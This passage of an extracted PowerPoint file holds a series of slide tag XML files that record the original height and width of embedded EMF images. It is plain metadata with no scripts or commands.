<file path=ppt/tags/tag442.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.75"/>
  <p:tag name="ORIGINALWIDTH" val="2.81252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag443.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.06252"/>
  <p:tag name="ORIGINALWIDTH" val="3.625"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag444.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.375"/>
  <p:tag name="ORIGINALWIDTH" val="3.25"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag445.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3.81252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag446.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.75"/>
  <p:tag name="ORIGINALWIDTH" val="2.81252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag447.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="3.06252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag448.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.375"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag449.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6"/>
  <p:tag name="ORIGINALWIDTH" val="1.93752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag45.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.522727"/>
  <p:tag name="ORIGINALWIDTH" val="3.522727"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag450.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="1.75"/>
  <p:tag name="ORIGINALWIDTH" val="3.375"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag451.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.81252"/>
  <p:tag name="ORIGINALWIDTH" val="3.18752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag452.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9375197"/>
  <p:tag name="ORIGINALWIDTH" val="0.9375197"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag453.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9375197"/>
  <p:tag name="ORIGINALWIDTH" val="0.9375197"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag454.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9375197"/>
  <p:tag name="ORIGINALWIDTH" val="0.9375197"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag455.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.06252"/>
  <p:tag name="ORIGINALWIDTH" val="2"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag456.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.375"/>
  <p:tag name="ORIGINALWIDTH" val="3.93752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag457.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="3.56252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag458.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.375"/>
  <p:tag name="ORIGINALWIDTH" val="3.81252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag459.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.125"/>
  <p:tag name="ORIGINALWIDTH" val="3.625"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag46.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.522727"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag460.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.75"/>
  <p:tag name="ORIGINALWIDTH" val="3.125"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag461.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.75"/>
  <p:tag name="ORIGINALWIDTH" val="2.875"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag462.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.375"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag463.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="3.125"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag464.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="2.93752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag465.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="3.125"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag466.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.375"/>
  <p:tag name="ORIGINALWIDTH" val="3.93752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag467.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.75"/>
  <p:tag name="ORIGINALWIDTH" val="2.81252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag468.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.375"/>
  <p:tag name="ORIGINALWIDTH" val="3.18752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag469.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.375"/>
  <p:tag name="ORIGINALWIDTH" val="3.25"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag47.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="3.693199"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag470.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.5"/>
  <p:tag name="ORIGINALWIDTH" val="3.06252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag471.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.81252"/>
  <p:tag name="ORIGINALWIDTH" val="3.56252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag472.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.06252"/>
  <p:tag name="ORIGINALWIDTH" val="2"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag473.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9375197"/>
  <p:tag name="ORIGINALWIDTH" val="0.9375197"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag474.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9375197"/>
  <p:tag name="ORIGINALWIDTH" val="1"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag475.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9375197"/>
  <p:tag name="ORIGINALWIDTH" val="0.9375197"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag476.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.93752"/>
  <p:tag name="ORIGINALWIDTH" val="3.5"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag477.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.18752"/>
  <p:tag name="ORIGINALWIDTH" val="3.625"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag478.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.43752"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag479.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.81252"/>
  <p:tag name="ORIGINALWIDTH" val="2.875"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag48.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.522727"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag480.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.81252"/>
  <p:tag name="ORIGINALWIDTH" val="3.56252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag481.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="1.68752"/>
  <p:tag name="ORIGINALWIDTH" val="3.43752"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag482.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.875"/>
  <p:tag name="ORIGINALWIDTH" val="3.5"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag483.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.93752"/>
  <p:tag name="ORIGINALWIDTH" val="3.31252"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag49.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.409091"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag50.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.5113815"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag51.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="2.784109"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag52.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="3.409091"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag53.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="0.9659269"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag54.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.886364"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag55.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.886364"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag56.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.886364"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag57.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.886364"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag58.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.829563"/>
  <p:tag name="ORIGINALWIDTH" val="3.011382"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag59.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.522727"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.465927"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag60.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="1.761382"/>
  <p:tag name="ORIGINALWIDTH" val="3.352291"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag61.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.329563"/>
  <p:tag name="ORIGINALWIDTH" val="0.6818182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag62.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.522727"/>
  <p:tag name="ORIGINALWIDTH" val="3.409091"/>
